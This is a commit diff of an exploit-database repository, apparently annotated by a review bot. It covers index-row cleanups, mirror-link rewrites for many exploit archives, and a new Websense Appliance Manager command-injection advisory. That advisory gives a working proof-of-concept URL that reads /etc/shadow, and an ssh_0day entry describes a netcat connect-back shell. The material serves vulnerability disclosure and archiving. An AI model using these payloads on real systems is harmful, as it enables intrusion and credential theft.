DB: 2015-03-19

2 new exploits
Offensive Security 2015-03-19 09:39:10 +00:00
parent 2c86657105
commit 5924dde297
1164 changed files with 1499 additions and 1313 deletions

@ -4481,7 +4481,7 @@ id,file,description,date,author,platform,type,port
4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0
4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0
4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0
4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0
4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0
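Review bot: the separator normalization in this hunk is applied to a single row (4841, inserting " - " before "ACTIVE XSS/SQL Injection Exploit") while the surrounding context still mixes conventions: 4838 already uses the "Product - Vulnerability" form, but 4839 ("CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit") and 4842 ("NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit") do not. If the goal is a uniform `name - description` column in files.csv, normalize the whole block in one pass, or state the rule being applied in the commit message so later commits don't keep re-touching one row at a time. The id, path, date, author, platform, type and port columns are unchanged, so the row remains a valid edit of the same record.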
@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
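Review bot: context line 5631 carries a typo in its description, "IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities" (should read "Multiple"); since this commit is already rewriting description strings in files.csv, fix it in the same pass rather than leaving it for another one. The 5632 change itself is fine: only " - " is inserted after "Debian OpenSSL", and the platform (multiple) and port (22) columns are preserved.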
@ -32839,6 +32839,8 @@ id,file,description,date,author,platform,type,port
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0
36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447
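Review bot: the two rows added here do not follow the separator convention that the same hunk applies to 36419: "Fortinet Single Sign On Stack Overflow" and "Websense Appliance Manager Command Injection Vulnerability" have no " - " between product and vulnerability. Apply it on insertion, e.g. "Websense Appliance Manager - Command Injection Vulnerability", so the normalization pass does not have to revisit these ids later. The hunk is otherwise consistent with the commit message: the header (6 lines to 8) and the lines shown amount to one replaced row (36419) plus two new rows, 36422 and 36423, with 36420 and 36421 as unchanged context; port 9447 on 36423 agrees with the PoC URL in the new advisory file in this commit.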

@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
# milw0rm.com [2009-08-18]
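Review bot: replacing `http://www.exploit-db.com/sploits/android-root-20090816.tar.gz` with `https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz` gains TLS but points at a moving branch: `raw/master` resolves to whatever is on master at fetch time, so the archive behind this 2009 entry can change without the entry changing. Pin the mirror to a commit (`raw/<sha>/sploits/...`) or record a digest of the tarball next to the link so a reader can verify that the copy they download is the one the entry describes. The same applies to every mirror URL rewritten in this commit. Keeping the `orig:` line pointing at the upstream source is correct.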

@ -10,7 +10,7 @@
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
# A similar exploitation vector was also added lately in Padbuster v0.3:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
# http://www.exploit-db.com/sploits/padBuster.pl
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info
A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality.
http://www.exploit-db.com/sploits/19840.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19840.tgz

@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags
Hacker mounts modified device as /usr.
Hacker installs backdoored /usr/bin/login.
http://www.exploit-db.com/sploits/19411.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19411.tgz

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info
A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process.
http://www.exploit-db.com/sploits/23655.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23655.tar.gz

@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip

@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
improper handling of environment variables.
Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0404.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf

@ -14,4 +14,4 @@ Vulnerability Description:
Some files that allow to obtain usernames and other internal information can be read by any user inside
the CLI.
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0403.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf

@ -196,7 +196,7 @@ Kingcope
A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
Mirror: http://www.exploit-db.com/sploits/ssh_0day.tar.gz
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first
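Review bot: only the `Mirror:` line is rewritten here; the primary download one line above, `http://isowarez.de/ssh_0day`, stays plain http, and the next file in this commit states "my box (isowarez.de) got hacked". For a statically linked binary that readers are told to run as `./ssh -1 -z <yourip> <target>`, the mirror is therefore the copy that matters: add a checksum for `ssh_0day.tar.gz` beside the new link so the archive can be verified, and pin the GitHub URL to a commit rather than `raw/master`.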

@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
/Signed "the awesome" Kingcope
Code:
http://www.exploit-db.com/sploits/7350roaringbeastv3.tar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar

@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be
Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services.
http://www.exploit-db.com/sploits/20593.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20593.tgz

@ -15,4 +15,4 @@ improper profile check.
===========
Download:
===========
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf

@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
===============
Download
===============
http://www.exploit-db.com/sploits/Sony_Ericsson.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar

@ -15,4 +15,4 @@ Users inside the CLI can run some kind of
of an insecure ulimit value.
Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0401.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf

@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/savysoda_poc.xls
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls

@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/office2_poc.xls
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls

@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/goodreader_poc.xls
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls

@ -130,7 +130,7 @@ other bugs and understanding them :)
http://aluigi.org/poc/samsux_1.zip
http://www.exploit-db.com/sploits/18751.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18751.zip
#######################################################################

@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to
This problem makes it possible for system local to the network to deny service to legitmate users of that network segment.
http://www.exploit-db.com/sploits/20821.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20821.tgz

@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate
This problem makes it possible for a remote user to deny service to legitimate users of the switch.
http://www.exploit-db.com/sploits/20824.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20824.tgz

@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw
This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678.
http://www.exploit-db.com/sploits/21092.mrc
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21092.mrc

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info
It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network.
http://www.exploit-db.com/sploits/22596.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22596.zip

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info
It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory.
http://www.exploit-db.com/sploits/22978.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22978.tgz

@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera
Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process.
http://www.exploit-db.com/sploits/23876.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23876.zip

@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib
All versions of cdp are assumed to be vulnerable to this issue.
http://www.exploit-db.com/sploits/23900.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23900.tgz

@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash
The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed.
http://www.exploit-db.com/sploits/28228.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28228.zip

@ -27,7 +27,7 @@ POC/EXPLOIT
you can open this url with the browser or send mms with this image.
http://es.geocities.com/jplopezy/nokiacrash.jpg
alt: http://www.exploit-db.com/sploits/2009-nokiacrash.jpg
alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg
------------------------------------------------------
Juan Pablo Lopez Yacubian

@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.
http://www.exploit-db.com/sploits/21001.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21001.tar.gz

@ -9,7 +9,7 @@
# V100R001B121Telmex
# Exploit Download Link:
# http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
# http://www.exploit-db.com/sploits/HG520_udpinfo.tar.gz
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz
By sending a specially crafted UDP packet you can remotely obtain the

@ -7,6 +7,6 @@
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
# CVE : No CVE US-CERT VU#723755
http://www.exploit-db.com/sploits/reaver-1.1.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz

@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info
Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem.
http://www.exploit-db.com/sploits/19538-1.tar.gz
http://www.exploit-db.com/sploits/19538-2.tar.gz
http://www.exploit-db.com/sploits/19538-3.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-1.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-2.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-3.tar.gz

@ -1,5 +1,5 @@
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
http://www.exploit-db.com/sploits/07182006-btvoyager.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz
# milw0rm.com [2006-07-18]

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info
When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret.
http://www.exploit-db.com/sploits/22532.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22532.tar.gz

@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all
Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access.
http://www.exploit-db.com/sploits/23212.tar.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23212.tar.bz2

@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term.
The 50 megs Mikrotik package including the all research items can be downloaded here:
http://www.farlight.org/mikropackage.zip
http://www.exploit-db.com/sploits/28056.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip

@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o
These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15.
http://www.exploit-db.com/sploits/31132.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31132.zip

@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl
Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
Software Versions: V100R001B120Telmex, V100R001B121Telmex
http://www.exploit-db.com/sploits/33869.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33869.tar.gz

@ -1,4 +1,4 @@
When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance.
The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device.
Advisory: http://www.exploit-db.com/sploits/34465.pdf
Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf

@ -197,7 +197,7 @@ name="backdoor">
Proof-of-concept brute force tool available at
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
http://www.exploit-db.com/sploits/2009-Louhi_CMC-brute_090323.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip
Other information:

@ -1,6 +1,6 @@
The pdf is located at:
http://www.exploit-db.com/sploits/lynn-cisco.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf
/str0ke

@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
Detailed description available here:
http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf
POC code available here: http://www.exploit-db.com/sploits/hnap0wn.tar.gz
POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz

@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
logged-in user.
Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0402.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf

@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node
Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse

@ -9,7 +9,7 @@ http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
# Tested on: TP-Link TL-WR740N v4
Exploit:
http://www.exploit-db.com/sploits/34254.7z
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34254.7z
Vulnerability description:
The domain name parameters of the "Parental Control" and "Access

@ -1,3 +1,3 @@
The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices.
http://www.exploit-db.com/sploits/ios_pdf_exploit.7z
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z

@ -54,7 +54,7 @@ into the JS code).
The full exploit code is available here:
http://packetstormsecurity.com/files/123088/
http://www.exploit-db.com/sploits/28081.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28081.tgz
+------------------------------------------------------------------------------+

@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne
An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers.
http://www.exploit-db.com/sploits/30502.tti
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30502.tti

@ -0,0 +1,38 @@
Abstract
A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Tested versions
This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well.
Fix
Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions
This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
Introduction
Websense Data Security Suite contains three modules - Data Security Gateway, Data Discover, and Data Endpoint - that can help manage the risk of losing your data to malicious users or accidental misuse.
The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Details
The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root).
With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
The following proof of concept will return the contents of /etc/shadow on affected appliances:
https://host:9447/appmng/servlet/CommandLineServlet?type=exec&uuid=asdfasdf&module=na1&command=ping&Destination=127.0.0.1'|cat%20/etc/shadow'
Other attack scenarios are also possible, like creating a backdoor account on the appliance.
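Review bot: the abstract's "remote unauthenticated attacks" is conditional and the Details section should say so up front: the proof-of-concept request to `CommandLineServlet` only executes if it is issued in an authenticated Appliance Manager session, which is why the text falls back on social engineering or a Cross-Site Scripting chain to get an authenticated user to send it. Two smaller points in the same hunk: the PoC value `Destination=127.0.0.1'|cat%20/etc/shadow'` closes and then reopens a single quote, which tells the reader that the servlet single-quotes the Destination parameter into a shell command line rather than passing it as a separate argument; stating that explicitly in the Details paragraph would make the root cause clearer than the general remark about the pipe character. The Introduction paragraph describes Websense Data Security Suite (Data Security Gateway, Data Discover, Data Endpoint), whereas the vulnerable component is the Appliance Manager command-line utility, so that boilerplate does not match the advisory. Wording: "to perform a remote unauthenticated attacks" should read "attack", "More information about the fixed" should read "the fix", and "The output is returned to the user, the commands are executed with elevated privileges (root)" needs a conjunction or a full stop between its two clauses. No CVE identifier is given in the file; if one exists it belongs in the Abstract.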

@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value
+------------------+
The proof of concept exploit code is available here:
http://www.exploit-db.com/sploits/35472.tgz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35472.tgz
http://packetstormsecurity.com/files/129398
+------------------------------------------------------------------------------+

@ -2,7 +2,7 @@ Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=283
Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz
Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36310.tar.gz
This is a proof-of-concept exploit that is able to gain kernel
privileges on machines that are susceptible to the DRAM "rowhammer"

@ -2,7 +2,7 @@ Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=284
Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz
Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36311.tar.gz
This is a proof-of-concept exploit that is able to escape from Native

@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi
It should be noted that the SITE INDEX command is affected as well.
http://www.exploit-db.com/sploits/20032.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz

@ -1,5 +1,5 @@
# linux/x86 xor-encoded Connect Back Shellcode 371 bytes
http://www.exploit-db.com/sploits/black-RXenc-con-back.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
# milw0rm.com [2006-04-18]

@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2

@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
Expat 2.0.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/2009-11-22-36097.gz
http://www.exploit-db.com/sploits/2009-11-22-36097-2.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz

@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
Versions up to and including libTIFF 3.9.4 are vulnerable.
PoC:
http://www.exploit-db.com/sploits/lp589145-sample.tif.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz

@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
--
http://pi3.com.pl
http://www.exploit-db.com/sploits/p_cve-2011-4362.c
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
http://blog.pi3.com.pl/?p=277

@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 <gst_riff_create_audio_caps+1888>
Proof of concept included.
http://www41.zippyshare.com/v/13083235/file.html
http://www.exploit-db.com/sploits/23427.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23427.rar

@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service
Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users.
http://www.exploit-db.com/sploits/23757.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23757.zip

@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab
Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game.
http://www.exploit-db.com/sploits/24815.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24815.zip

@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail.
# Tested on: [GNU/Linux]
# CVE : [CVE-2012-1663]
PoC: http://www.exploit-db.com/sploits/24865.tar.bz2
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24865.tar.bz2
I'm glad to share this to you guys. The test code was attached. You
also could find them here:

@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities.
